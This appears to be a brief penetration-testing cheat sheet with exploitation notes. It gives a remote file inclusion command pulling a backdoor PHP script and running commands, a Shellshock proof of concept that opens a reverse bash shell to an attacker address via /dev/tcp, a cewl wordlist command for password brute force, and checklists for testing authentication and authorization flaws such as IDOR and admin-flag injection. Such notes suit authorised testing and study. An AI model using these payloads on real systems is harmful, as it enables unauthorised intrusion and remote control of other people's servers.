Exploitation

WebShell

File Include

curl http://target/?page=http://php/backdoor.php&cmd=id

Shellshock POC

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh

Virtual hosting

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers).

Brute Force Password

Create Passwd Directory

cewl -m 5 http://$ip/joomla/ > passwd.txt

Authentication

1. Check cookies

2. Check "admin" and "Admin", "admin " and "admin"

3. Check the redirection

Authorization

1. Check IDOR

2. Check .js, .json

3. Check Object-relational mapping (&admin[admin]=1)